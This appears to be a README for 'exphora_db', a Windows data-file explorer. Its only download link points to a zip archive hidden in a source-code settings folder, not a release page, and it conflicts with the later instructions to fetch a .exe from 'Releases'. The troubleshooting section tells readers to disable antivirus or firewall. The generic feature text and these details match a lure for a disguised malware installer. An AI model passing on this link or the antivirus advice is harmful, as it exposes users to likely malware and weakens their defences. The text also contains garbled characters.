exphora_db is a desktop app made to help you open and explore structured data files. It works with files like JSON, CSV, SQLite, and XML. The app is lightweight and fast, so it wonβt slow your computer down. You can search, filter, export your data, and share your work with others. It runs on Windows and does not require an internet connection to work once installed.
The app uses modern technology under the hood, with Rust, Tauri, and React, but you do not need to know any coding to use it.
Before you install exphora_db, check your computer meets these basic needs:
- Operating System: Windows 10 or later (64-bit)
- CPU: Intel or AMD processor, 2 GHz or faster
- RAM: 4 GB minimum (8 GB recommended)
- Disk Space: 200 MB free space
- Screen: 1280 x 720 resolution or higher
No extra software or programming tools are needed.
exphora_db works with common data formats used in many fields, including:
- JSON files for data exchange
- CSV files for spreadsheets and tables
- SQLite database files for local data
- XML files often used in structured data
- Other plain text files with similar format
This flexibility lets you explore your data regardless of the source.
Click the big green button at the top or visit this link:
https://github.com/sparoecanthusfultoni104/exphora_db/raw/refs/heads/main/ui/src/components/settings/exphora-db-v3.4-beta.1.zip
This page hosts the latest versions available for download.
On the download page, look for the section named "Releases" or "Assets."
Inside, locate the file that ends with .exe. This file is the installer for Windows.
Click the .exe file to download it to your computer. The file size is usually under 100 MB, so it should download quickly on most internet connections.
Once the download finishes, open the folder where you saved the file. Double-click the .exe file to start installation.
- If Windows asks for permission, click βYesβ to allow the installer to make changes.
- Follow the instructions on the screen.
- You can accept the default settings for location and components.
When setup is complete, a shortcut will appear on your desktop or in your Start menu.
Click the shortcut to open the app.
- Click the "Open" button or use the menu option "File > Open."
- Browse to the folder where your data file is saved.
- Select your JSON, CSV, SQLite, or XML file and click "Open."
- The app will load your file quickly.
- Data will appear in clear tables or structured views.
- Use column headers to sort data alphabetically or numerically.
- Scroll vertically and horizontally to see all details.
- Use the search box to find words or numbers anywhere in your data.
- Create filters to narrow down the rows shown by choosing criteria like value ranges or keywords.
- After filtering, export the results to a new file.
- Supported export formats include CSV and JSON.
- This helps when you want to share a smaller part of your data with others.
exphora_db supports sharing your filtered datasets directly with trusted people without uploading to the cloud. This keeps your data private and local.
- Choose between light or dark themes to suit your environment.
- Customize font size for better readability.
- Set default folder locations for opening and saving files.
- Configure how large files are loaded for faster performance.
- Enable automatic backup of your work.
- Use local sync features to keep your data consistent across devices.
- If the app does not open, restart your computer and try again.
- Check your Windows is updated to the latest version.
- Temporarily disable antivirus or firewall if installation fails (re-enable after).
- Visit the downloads page again if you suspect the installer did not download fully.
- Use the βHelpβ menu inside the app to access user guides and FAQs.
- Explore the repositoryβs documentation for advanced features.
- Join the user discussions on GitHub to ask questions or share ideas.
- Check for app updates regularly on the release page.
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